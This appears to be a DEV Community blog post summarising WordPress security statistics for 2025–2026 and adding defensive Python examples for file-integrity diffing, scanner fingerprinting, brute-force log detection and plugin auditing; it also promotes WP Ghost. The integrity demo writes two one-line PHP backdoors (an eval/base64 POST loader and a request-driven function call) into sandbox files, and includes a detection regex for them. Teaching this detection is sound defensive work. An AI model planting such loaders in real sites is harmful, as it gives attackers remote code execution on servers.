DEV Community

Calin V.

43 WordPress Security Data Points That Should Change How You Build Sites in 2026

Every year, Patchstack publishes a whitepaper on the state of WordPress security. Every year, the numbers get worse. The 2026 edition dropped on February 25, and the headline numbers are hard to ignore.

This post pulls together 43 verified data points from 18 original research sources into the picture you need if you build, manage, or host WordPress sites. No speculation, no fear marketing, just numbers and what they mean for your workflow.

The full sourced version with inline citations lives on the WP Ghost research page. This is the developer-focused summary.


The Four Numbers That Define WordPress Security Right Now

Before getting into the breakdown, these four stats frame everything that follows:

  • 11,334 new WordPress vulnerabilities recorded in 2025, a 42% increase year-on-year
  • ~13,000 WordPress sites hacked per day, roughly 4.7 million annually
  • 5 hours, the weighted median from vulnerability disclosure to mass exploitation
  • 87.8% of WordPress-specific exploits bypass standard hosting firewalls

If you only remember four numbers from this post, those are the ones.


How Large Is the Attack Surface?

WordPress powers 43.5% of all websites on the internet (Hostinger, 2026). That's not a niche CMS. That's nearly half the web running on the same stack, with the same default paths, the same directory structure, and the same plugin ecosystem.

From an attacker's perspective, the economics are straightforward. Write one scanner, point it at the internet, and nearly every other site you hit is WordPress. The attacks don't need to be clever. They just need to be automated and fast.

Wordfence, the most widely deployed WordPress security plugin, blocks 55 million exploit attempts and over 6.4 billion brute force attacks every single month across its network (TDW Digital, 2025). That's the permanent baseline, not a spike.

Most of those attacks are not targeted. Bots scan millions of sites daily looking for the same fingerprints: a /wp-login.php path, an exposed version number in a meta tag, a plugin signature in the page source. They are not interested in your site specifically. They are interested in any site that looks like a standard WordPress installation.


11,334 Vulnerabilities: Where Are They Coming From?

Patchstack confirmed a record year. Not close to a record. Definitively the worst year on record, by a wide margin.

The growth over three years tells the story:

Year   Vulnerabilities   Change vs prior year
2023   ~5,900            baseline
2024   ~7,966            +35%
2025   11,334            +42%

And Q1 2026 is not slowing down. In the first week of January 2026 alone, 333 new vulnerabilities were disclosed, with 120 of them having no patch when they went public (WebHostMost, Mar 2026). The weekly average heading into 2026 is 250+ plugin vulnerabilities per week, roughly 36 per day.

It's Not Core

Only two vulnerabilities were reported in WordPress core in all of 2025 (Patchstack 2026). Two.

The problem is the plugin ecosystem:

  • 91% of vulnerabilities come from plugins
  • 6% from themes
  • 2 from core (those two), which against 11,334 total is well under 0.1%, not the "2%" sometimes quoted

Every plugin you install is a potential entry point. The average WordPress installation runs 20 to 30 plugins. The math is not complicated.

The Severity Jump

Highly exploitable vulnerabilities, the ones attackers weaponize at scale, increased by 113% year-on-year in 2025 (The Repository / Patchstack, Mar 2026). More high-severity CVEs were found in 2025 than in the previous two years combined.

AI-Generated Plugins Are Making It Worse

Patchstack's 2026 report specifically calls out "vibe coding," where developers use LLMs to generate plugin code and ship it without being able to audit what the model wrote. When the person shipping the code can't review it for security problems, vulnerabilities go live silently. This trend is accelerating, not stabilizing.


The 5-Hour Problem

Here is the number from Patchstack's 2026 report that fundamentally changes how you should think about WordPress security:

"The weighted median time to first mass exploitation was five hours."

  • Patchstack, State of WordPress Security in 2026

Five hours from public disclosure to active mass exploitation.

The traditional advice, "keep your plugins updated," assumes you have time to react. For heavily targeted vulnerabilities, you often don't.

The exploitation timeline breaks down like this:

Window            What happens
0-5 hours         Median first mass exploitation attempt. Automated scanners watch disclosure feeds and deploy exploit code within hours.
Within 6 hours    20% of top-targeted vulnerabilities are actively exploited.
Within 24 hours   45%. By the time most site owners read about it in a newsletter, attacks have been running for a full day.
Within 7 days     70%. Roughly when most people get around to clicking that update notification they've been ignoring.

And what makes the 5-hour window even more dangerous:

46% of vulnerabilities had no patch available at the time of public disclosure (WP Edition / Patchstack, Feb 2026). There is no update to apply. The vulnerability is public, documented, actively scanned for, and the plugin is still broken.

Why? Because 52% of plugin developers do not patch before disclosure (Patchstack via Xictron, 2026). The researcher found the bug, reported it responsibly, waited the standard disclosure window, published, and the developer still hadn't shipped a fix.

Patchstack says it plainly: "Regular plugin updates are the second line of defence, but as attackers weaponize new vulnerabilities within mere hours, this is not a viable defence."


Where Do Hackers Actually Get In?

The vulnerability type distribution for 2025-2026:

Attack type                          Share                Auth required?
Cross-Site Scripting (XSS)           dominant, ~35-39%    often none
Cross-Site Request Forgery (CSRF)    ~19%                 a logged-in victim's session, not the attacker's
Local File Inclusion (LFI)           ~12.6%               often none
Broken Access Control                ~10.9%               a low-privilege account
SQL Injection                        ~7.2%                often none

XSS dominates because every unescaped output in plugin code is a potential instance, and fixing it completely means auditing every output sink rather than patching one function. CSRF is listed against an existing session because the attacker rides a logged-in victim's browser; no account of their own is needed.

The critical detail: 57% of vulnerabilities in H1 2025 required no authentication whatsoever (Patchstack Mid-Year 2025). No login needed. No password to steal. Just a vulnerable plugin, installed and active.

What Attackers Leave Behind

Sucuri's data on what's found on compromised WordPress sites (Sucuri via Hostinger, 2026):

  • 72.7% contain active malware
  • 69.6% have unauthorized backdoors, persistent access the attacker can use later
  • 46.7% have SEO spam injected, hidden keyword-stuffed content that triggers Google penalties
  • 8.1% have phishing pages embedded within the site

The 2026 Patchstack and Monarx report adds an important shift: attackers are now injecting code directly into legitimate WordPress core, plugin, and theme files rather than dropping standalone malicious files. The traditional "scan and delete" approach to malware removal misses this entirely (The Repository, Mar 2026).
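This is the practical consequence of that shift: if the malicious code lives inside wp-includes/functions.php, a scanner that only looks for unknown files finds nothing, and only a comparison against a known-good hash of every file catches it. The following added example (not code from the post, from Patchstack, or from any plugin named here) baselines a miniature install with SHA-256, injects a one-line loader into a legitimate core file plus one standalone dropper for contrast, and reports what an integrity diff sees. The directory tree, file contents and the "example-plugin" slug are constructed for the example; in production the baseline for core files comes from WordPress.org's published checksums (WP-CLI's `wp core verify-checksums` does that comparison for core), and the pattern list here is only a triage aid, not a malware signature set.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# A short, illustrative pattern list for injected PHP loaders. Real scanners carry
# far larger signature sets; the integrity diff is what catches what signatures miss.
SUSPICIOUS = re.compile(
    r"\beval\s*\(|base64_decode\s*\(|gzinflate\s*\(|str_rot13\s*\(|\$_(?:POST|GET|REQUEST)\[[^\]]*\]\s*\(",
    re.I,
)


def hash_tree(root, suffixes=(".php",)):
    """Map every file under `root` with a matching suffix to its SHA-256 (paths relative to root)."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in root.rglob("*")
        if p.is_file() and p.suffix in suffixes
    }


def diff_baseline(baseline, current):
    """Compare two hash maps. 'modified' is the case a scan-and-delete approach misses:
    the file is legitimate and expected, only its content changed."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline.keys() & current.keys() if baseline[p] != current[p]),
    }


def suspicious_lines(path):
    """(line_number, text) for every line of `path` that matches SUSPICIOUS."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return [(n, line.strip()) for n, line in enumerate(fh, 1) if SUSPICIOUS.search(line)]


def demo():
    """Constructed scenario: baseline a miniature install, then inject a loader into a
    legitimate core file and drop one standalone file, and report what the diff sees."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        core = root / "wp-includes"
        plugin = root / "wp-content" / "plugins" / "example-plugin"  # hypothetical plugin slug
        core.mkdir()
        plugin.mkdir(parents=True)
        (core / "functions.php").write_text("<?php\nfunction wp_example() { return 1; }\n")
        (plugin / "example-plugin.php").write_text("<?php\n// Plugin Name: Example Plugin\n")
        baseline = hash_tree(root)

        # Attacker appends a one-line loader to a legitimate core file (no new file dropped)...
        with open(core / "functions.php", "a") as fh:
            fh.write('if (isset($_POST["k"])) { eval(base64_decode($_POST["k"])); }\n')
        # ...and also drops a standalone file, the case that file-based scanning does catch.
        (root / "wp-content" / "cache.php").write_text('<?php $_REQUEST["f"]($_REQUEST["a"]);\n')

        report = diff_baseline(baseline, hash_tree(root))
        report["hits"] = {p: suspicious_lines(root / p) for p in report["modified"] + report["added"]}
        return report


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The diff reports wp-includes/functions.php as modified with the injected line at line 3, and wp-content/cache.php as added; a scanner that only lists unknown files would have shown the second and stayed silent on the first. Store the baseline off the web root (an attacker who can write to functions.php can also rewrite a hash file next to it), and re-baseline only after a verified update.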

The Login Page Problem

In 2023, Wordfence blocked over 100 billion credential stuffing attacks from 74 million unique IP addresses. The vast majority targeted the standard /wp-login.php and /wp-admin paths. 81% of hacked WordPress sites involved weak or stolen passwords as a contributing factor (Sucuri and Wordfence via HowToWP).

If your login page is at the default URL, you are absorbing every automated attack that knows where to look.


Why Hosting Firewalls Are Not Enough

Managed WordPress hosting is expensive and comes with security messaging all over the pricing page. Those server-level firewalls are doing something, just not nearly enough.

87.8% of WordPress-specific exploits bypass standard hosting defenses (Patchstack via Xictron, 2026). Standard hosting defenses block only about 26% of WordPress-targeted attacks.

The reason is structural. Network and server firewalls were designed to block broad categories of malicious traffic: DDoS floods, port scans, known malicious IPs. They were not designed to understand the application-specific semantics of a stored XSS vulnerability in version 3.4.1 of a specific WordPress plugin. That requires application-layer intelligence.

Patchstack's 2026 conclusion: "In 2026, everybody needs deep visibility into what their websites are made of and put automated security measures in place to mitigate new security vulnerabilities in less than five hours."

The EU Cyber Resilience Act

By September 2026, all plugin and theme developers distributing software to EU users must have vulnerability disclosure programs in place by law. Whether this will meaningfully reduce the 52% non-patch-before-disclosure rate remains to be seen (Patchstack 2025 Whitepaper).


What Does a WordPress Hack Actually Cost?

The headline figure: $14,500 average total recovery cost for a small business (Colorlib, Xictron 2026).

That includes malware removal, emergency developer time, downtime, lost revenue, and the months of SEO work required to undo injected spam links and Google manual penalties. Against approximately $8/month for active protection, the math is not close.

The Melapress 2025 Security Survey found that 59.2% of WordPress professionals say the biggest impact of getting hacked is the loss of time, not money. The late nights, the emergency calls, the stress of rebuilding something that was working fine yesterday.

A real scenario: A WooCommerce store gets flagged by Google on a Friday afternoon. Malware was redirecting the checkout page to a phishing site. By Monday morning, it's been three days. Google Search Console has a manual penalty notice. PayPal suspended the account. Finding the backdoor, cleaning injected files, restoring backups, requesting Google review: 11 days total. $4,200 in lost orders. $1,200 for emergency cleanup. $5,400 total. The security plugin subscription they had skipped: $96 per year.


Are WordPress Site Owners Actually Prepared?

The Melapress WordPress Security Survey 2025 maps preparation against concern, and the gap is uncomfortable. Site owners rate their concern at 7.8 out of 10 on average. Two-thirds scored it 8 or higher.

And yet:

  • Only 27% have a breach recovery plan. The other 73% have no documented answer to "what do we do when this happens?"
  • Only 27% implement team security training
  • Among those who had experienced account compromises, 30% still hadn't implemented any user account security controls
  • Only 59% use a WordPress activity log to detect suspicious behavior
  • Web designers and developers, the professionals who build WordPress sites, are the least likely to use automatic updates, at 32% and 33% respectively

There's also an outsourcing gap: 31% of in-house managers have a recovery plan, but only 13% of those relying on third parties do (Melapress, Oct 2025).

If you've outsourced security, ask your provider directly: what is the plan if we get hacked?


What Does the Data Say Actually Works?

The genuinely good news: the overwhelming majority of WordPress hacks are preventable. OsomStudio's 2026 security analysis estimates that basic security hygiene stops more than 90% of attacks (OsomStudio, 2026).

Most attackers are opportunistic. When a site looks harder to target than average, they move on.

Based on the attack data above, effective WordPress hack prevention works in three layers:

Layer 1: Disappear from Scanners

Automated scanners identify WordPress installations by their fingerprints: version numbers in meta tags, the /wp-login.php path, the readme.html file in root, plugin signatures in source code.

Remove those signals and mass-scanning tools cannot confirm you are running WordPress, and most of them move on. This is attack surface reduction as a first defense against the opportunistic majority. It is not a patch: a scanner that already has your hostname from an earlier sweep, or one that simply fires the exploit request at /wp-admin/admin-ajax.php or a plugin's REST route without checking first, is unaffected, so the vulnerable plugin still has to be updated or removed.

The data shows why reconnaissance matters to the attacker: 57% of vulnerabilities require no authentication, so the only thing between a scanner and the exploit is knowing which sites carry the plugin. Denying that knowledge raises the cost of the first step in the automated chain; it does not remove the vulnerability behind it.

Tools that do this: WP Ghost (full path security, 115+ features in the free version), WPS Hide Login (login path only), or manual rewrite rules if you prefer to roll your own.
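Seen from the scanner's side, Layer 1 is a list of regexes and three HTTP probes. The following added example (not code from the post, and not WP Ghost's or any other plugin's) extracts the fingerprints a mass scanner keys on from a page body and from the status codes of /readme.html, /wp-login.php and /xmlrpc.php, then runs the same check against the page after the signals are removed. The HTML, readme snippet, probe results and the "example-forms" and "example-theme" slugs are constructed for the example.

```python
import re

# Signals a default WordPress install emits, as a mass scanner sees them.
GENERATOR = re.compile(r'<meta\s+name=["\']generator["\']\s+content=["\']WordPress\s*([\d.]*)', re.I)
REST_DISCOVERY = re.compile(r'<link[^>]+rel=["\']https://api\.w\.org/["\']', re.I)   # wp-json discovery link
PLUGIN_ASSET = re.compile(r'/wp-content/plugins/([a-z0-9_-]+)/[^"\'\s]*?\?ver=([\d.]+)', re.I)
THEME_PATH = re.compile(r'/wp-content/themes/([a-z0-9_-]+)/', re.I)
CORE_PATH = re.compile(r'/wp-(?:includes|content)/', re.I)
README_VERSION = re.compile(r'<br\s*/?>\s*Version\s+([\d.]+)', re.I)   # version line in readme.html


def fingerprint(html, probes, readme_body=""):
    """Return (signal, detail) pairs a scanner could use to confirm WordPress and pick targets.
    `probes` maps a probed path to the HTTP status it returned."""
    signals = []
    m = GENERATOR.search(html)
    if m:
        signals.append(("generator", m.group(1) or "present"))
    if REST_DISCOVERY.search(html):
        signals.append(("rest-discovery", "api.w.org link"))
    for slug, ver in sorted(set(PLUGIN_ASSET.findall(html))):
        signals.append(("plugin", f"{slug}@{ver}"))   # slug plus exact version: the scanner's target list
    for theme in sorted(set(THEME_PATH.findall(html))):
        signals.append(("theme", theme))
    if CORE_PATH.search(html):
        signals.append(("path", "wp-content or wp-includes referenced"))
    if probes.get("/readme.html") == 200:
        m = README_VERSION.search(readme_body)
        signals.append(("readme", m.group(1) if m else "present"))
    if probes.get("/wp-login.php") == 200:
        signals.append(("login", "/wp-login.php"))
    if probes.get("/xmlrpc.php") == 405:   # a GET to xmlrpc.php answers 405 "accepts POST requests only"
        signals.append(("xmlrpc", "/xmlrpc.php"))
    return signals


def looks_like_wordpress(signals):
    """A scanner does not need certainty; two independent signal types is plenty."""
    return len({kind for kind, _ in signals}) >= 2


# Constructed page from a default install (slugs and versions hypothetical).
DEFAULT_HTML = """<html><head>
<meta name="generator" content="WordPress 6.7.1" />
<link rel='https://api.w.org/' href='https://example.test/wp-json/' />
<link rel='stylesheet' href='https://example.test/wp-content/plugins/example-forms/css/style.css?ver=1.4.2' />
<link rel='stylesheet' href='https://example.test/wp-content/themes/example-theme/style.css?ver=1.2' />
</head><body></body></html>"""
DEFAULT_PROBES = {"/readme.html": 200, "/wp-login.php": 200, "/xmlrpc.php": 405}
DEFAULT_README = '<h1><img alt="WordPress" src="wp-admin/images/wordpress-logo.png" /><br /> Version 6.7.1</h1>'

# Same page after the Layer 1 treatment: generator tag and discovery link removed, assets
# served from rewritten paths without ?ver=, and the default files answering 404.
HARDENED_HTML = """<html><head>
<link rel='stylesheet' href='https://example.test/assets/forms/style.css' />
<link rel='stylesheet' href='https://example.test/assets/site/style.css' />
</head><body></body></html>"""
HARDENED_PROBES = {"/readme.html": 404, "/wp-login.php": 404, "/xmlrpc.php": 404}


if __name__ == "__main__":
    print("default :", fingerprint(DEFAULT_HTML, DEFAULT_PROBES, DEFAULT_README))
    print("hardened:", fingerprint(HARDENED_HTML, HARDENED_PROBES))
```

The default page gives the scanner not just "this is WordPress" but an exact plugin slug and version to match against a vulnerability feed; the hardened page gives it nothing to key on. The caveat stands: a scanner that skips the fingerprint step and posts the exploit payload to the plugin's endpoint directly is not stopped by any of this.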

Layer 2: Filter at the Application Layer

What hosting firewalls miss (87.8% of it, by Patchstack's count), a firewall that understands WordPress requests at the application layer can catch:

  • 8G Firewall rules for SQL injection, XSS, file inclusion and directory traversal payloads in request URIs, query strings and user agents
  • Brute force protection plus 2FA, to address the 81% of hacks involving credential attacks
  • XML-RPC and REST API restrictions to close entry points most sites don't need open (xmlrpc.php accepts username and password too, so it is a credential-attack surface in its own right)
  • Geo-blocking to cut automated attack volume from regions your site never serves (a volume reduction, not a control: attackers behind proxies pass through)
  • Moving the login page off /wp-login.php, since most automated credential attacks target that path specifically

Tools: WP Ghost (built-in 7G/8G firewall, 2FA with passkeys), Wordfence (endpoint firewall + scanner), Sucuri (cloud WAF), or a combination.

Layer 3: Monitor and Detect

Activity logging, file integrity monitoring, and anomaly alerts are the difference between catching a compromise in hour one and discovering it three months later when Google sends a penalty notice. Given that 69.6% of hacked sites contain unauthorized backdoors, detection speed directly affects total recovery cost.

Tools: WP Ghost Security Threats Log (Premium), Wordfence live traffic, Sucuri audit log, or WP Activity Log.
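What "catching a compromise in hour one" looks like for the credential attacks described under The Login Page Problem is a threshold over the access log, which every host already writes. The following added example (not code from the post or from any of the tools named above) parses combined-format access log lines, slides a five-minute window per source IP over POSTs to /wp-login.php and /xmlrpc.php, and flags bursts. It uses the fact that a failed wp-login.php POST re-renders the form with HTTP 200 while a success redirects with 302, so a 302 from an already-flagged IP is reported as a possible successful login; xmlrpc.php answers 200 either way, so there is no success signal there. The log lines are generated inline and are constructed, not real traffic; the addresses are documentation ranges.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache/Nginx combined log format: request line, status, bytes (referer and UA ignored here).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
LOGIN_PATHS = {"/wp-login.php", "/xmlrpc.php"}


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],
        "status": int(m["status"]),
    }


def detect_credential_attacks(lines, window=timedelta(minutes=5), threshold=10):
    """Flag IPs that POST to a login endpoint more than `threshold` times inside any `window`.
    Returns {ip: {"peak": n, "paths": set, "possible_success": bool}}."""
    events = [e for e in map(parse_line, lines)
              if e and e["method"] == "POST" and e["path"] in LOGIN_PATHS]
    events.sort(key=lambda e: e["ts"])
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    findings = {}
    for e in events:
        q = recent[e["ip"]]
        q.append(e["ts"])
        while e["ts"] - q[0] > window:   # q is never empty here: we just appended e["ts"]
            q.popleft()
        if len(q) > threshold:
            f = findings.setdefault(e["ip"], {"peak": 0, "paths": set(), "possible_success": False})
            f["peak"] = max(f["peak"], len(q))
            f["paths"].add(e["path"])
        # A 302 on wp-login.php after a flagged burst means a credential worked.
        if e["ip"] in findings and e["path"] == "/wp-login.php" and e["status"] == 302:
            findings[e["ip"]]["possible_success"] = True
    return findings


def build_sample_log():
    """Constructed log, not real traffic: one stuffing burst on wp-login.php that ends in a
    302, one xmlrpc.php burst, one normal user retrying a password, and a plain page view."""
    t0 = datetime(2026, 3, 10, 14, 0, 0, tzinfo=timezone.utc)

    def fmt(ip, t, method, path, status):
        return (f'{ip} - - [{t.strftime("%d/%b/%Y:%H:%M:%S %z")}] '
                f'"{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"')

    lines = []
    for i in range(30):   # 30 failures in 90 seconds, then a success
        lines.append(fmt("203.0.113.5", t0 + timedelta(seconds=3 * i), "POST", "/wp-login.php", 200))
    lines.append(fmt("203.0.113.5", t0 + timedelta(seconds=95), "POST", "/wp-login.php", 302))
    for i in range(15):   # xmlrpc.php burst; status is 200 whether or not the password was right
        lines.append(fmt("203.0.113.9", t0 + timedelta(seconds=2 * i), "POST", "/xmlrpc.php", 200))
    for i in range(3):    # a real user mistyping a few times, well under the threshold
        lines.append(fmt("198.51.100.7", t0 + timedelta(minutes=i), "POST", "/wp-login.php", 200))
    lines.append(fmt("198.51.100.7", t0 + timedelta(minutes=4), "POST", "/wp-login.php", 302))
    lines.append(fmt("192.0.2.1", t0, "GET", "/", 200))
    return lines


if __name__ == "__main__":
    for ip, f in detect_credential_attacks(build_sample_log()).items():
        print(ip, f)
```

On the sample, 203.0.113.5 is flagged with a peak of 31 requests in the window and a possible successful login, 203.0.113.9 is flagged for the xmlrpc.php burst, and the retrying user is not flagged. The "possible success" case is the one that needs a human now: reset that account's password and sessions rather than only blocking the IP, since the attacker already has a credential that works.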


Three Things You Can Do This Week

If this wall of stats is overwhelming, start here:

1. Audit your plugins

List every plugin on your site. For each one: is it actively maintained? When was the last update? Is it tested against the core version you run? Does your site actually need it? Remove anything unused. Deactivated is not removed: a deactivated plugin's PHP files are still on disk, and any file that can be requested directly by URL is still reachable, so every inactive plugin is an attack surface with zero upside. Delete it.
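Once the data is in one place the audit is mechanical, so here is an added example (not from the post or from WP Ghost) that runs it. It assumes two inputs: the JSON that WP-CLI's `wp plugin list --format=json` prints for what is installed, and the WordPress.org plugin information API (`https://api.wordpress.org/plugins/info/1.2/?action=plugin_information&request[slug]=...`) for what is current, including its `last_updated` and `tested` fields. Both samples below are constructed for the example, the plugin slugs are hypothetical, and "today" is pinned so the result is reproducible.

```python
import json
from datetime import datetime, timezone

# Constructed sample of `wp plugin list --format=json` output (slugs hypothetical).
INSTALLED_JSON = """[
  {"name": "example-forms", "status": "active",   "update": "available", "version": "1.4.2"},
  {"name": "old-gallery",   "status": "inactive", "update": "none",      "version": "0.9"},
  {"name": "example-cache", "status": "active",   "update": "none",      "version": "3.1.0"}
]"""

# Constructed sample of the WordPress.org plugin information API, keyed by slug.
API_INFO = {
    "example-forms": {"version": "1.4.3", "last_updated": "2026-02-20 9:15am GMT",  "tested": "6.7.2"},
    "old-gallery":   {"version": "0.9",   "last_updated": "2022-06-01 3:40pm GMT",  "tested": "6.0"},
    "example-cache": {"version": "3.1.0", "last_updated": "2026-01-11 11:05am GMT", "tested": "6.6.1"},
}
NOW = datetime(2026, 4, 1, tzinfo=timezone.utc)   # fixed "today" so the example is reproducible


def parse_wporg_date(text):
    """The API reports last_updated in the form '2026-02-20 9:15am GMT' (assumed here)."""
    return datetime.strptime(text, "%Y-%m-%d %I:%M%p GMT").replace(tzinfo=timezone.utc)


def version_tuple(text):
    """'6.7.2' -> (6, 7, 2) so versions compare numerically rather than as strings."""
    return tuple(int(part) for part in text.split(".") if part.isdigit())


def audit_plugins(installed_json, api_info, core_version, now=NOW, stale_days=365):
    """Return {slug: [(code, message), ...]}. An empty list means nothing to do for that plugin."""
    findings = {}
    for plugin in json.loads(installed_json):
        issues = []
        if plugin["status"] != "active":
            issues.append(("inactive", "deactivated is not removed: its files are still on disk, delete it"))
        info = api_info.get(plugin["name"])
        if info is None:
            issues.append(("unknown", "not on wordpress.org: confirm the vendor still ships fixes"))
        else:
            age = (now - parse_wporg_date(info["last_updated"])).days
            if age > stale_days:
                issues.append(("stale", f"last release {age} days ago"))
            if version_tuple(info["version"]) > version_tuple(plugin["version"]):
                issues.append(("outdated", f"{plugin['version']} installed, {info['version']} available"))
            # Compare major.minor only: a plugin tested on 6.7.2 is fine on 6.7.3 but untested on 6.8.
            if version_tuple(info["tested"])[:2] < version_tuple(core_version)[:2]:
                issues.append(("untested", f"tested up to {info['tested']}, core is {core_version}"))
        findings[plugin["name"]] = issues
    return findings


if __name__ == "__main__":
    for slug, issues in audit_plugins(INSTALLED_JSON, API_INFO, "6.8").items():
        print(slug, issues or "ok")
```

Against a core version of 6.8, the sample flags example-forms as outdated and untested, old-gallery as inactive, stale and untested, and example-cache as untested only. A plugin that is not on WordPress.org at all (a purchased or custom one) gets an "unknown" entry rather than a pass, because no automated check can tell you whether its vendor still ships fixes.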

2. Check your login URL

If your login page is still at /wp-login.php or /wp-admin, every automated brute-force campaign knows exactly where to hit. Changing the login path takes about two minutes and drops most of the credential-stuffing traffic aimed at the default URL immediately. It does not stop credentials being tried against xmlrpc.php (the wp.getUsersBlogs method takes a username and password, and system.multicall lets one request test many pairs), so disable XML-RPC unless something you run needs it, and turn on 2FA for every account that can publish or install plugins.

3. Write a one-page recovery plan

Answer: who do I call, what do I check first, where are my backups, how do I put the site in maintenance mode? The 73% without a plan make recovery take 3-4x longer, not because they are less capable, but because they are making decisions under stress without a framework.


Summary

According to data compiled from 18 original research sources:

  • 11,334 new WordPress vulnerabilities in 2025, the highest ever, a 42% increase year-on-year (Patchstack, Feb 2026)
  • ~13,000 WordPress sites hacked per day, totaling 4.7 million annually (WPMayor via Sophos)
  • 5 hours median from disclosure to mass exploitation, with 46% of vulnerabilities having no patch at the time of disclosure (Patchstack 2026)
  • 87.8% of WordPress-specific exploits bypass hosting firewalls (Patchstack via Xictron 2026)
  • $14,500 average recovery cost for a small business, versus approximately $8/month for proactive protection (Colorlib, Xictron 2026)
  • ~90% of attacks are preventable through basic security hygiene (OsomStudio 2026)

The full version with all 43 data points and inline source citations: WordPress Security Statistics 2025-2026


Data sourced from Patchstack 2026 Whitepaper, Patchstack Mid-Year 2025, Wordfence, Sucuri, Melapress 2025 Security Survey, OsomStudio 2026, Hostinger, WPMayor/Sophos, Colorlib, Xictron 2026, TDW Digital 2025, WebHostMost 2026, WP Edition, The Repository/Patchstack, and HowToWP. All numbers verified as of April 2026.

Top comments (1)

Knowband

This is a powerful, data-driven wake-up call that shifts WordPress security from “best practice” to “urgent necessity.” The 5-hour exploitation window and the dominance of plugin vulnerabilities really stand out; it makes it clear that reactive security is no longer enough and proactive hardening is the only viable approach.
This is a powerful, data-driven wake-up call that shifts WordPress security from “best practice” to “urgent necessity.” The 5-hour exploitation window and the dominance of plugin vulnerabilities really stand out, it makes it clear that reactive security is no longer enough and proactive hardening is the only viable approach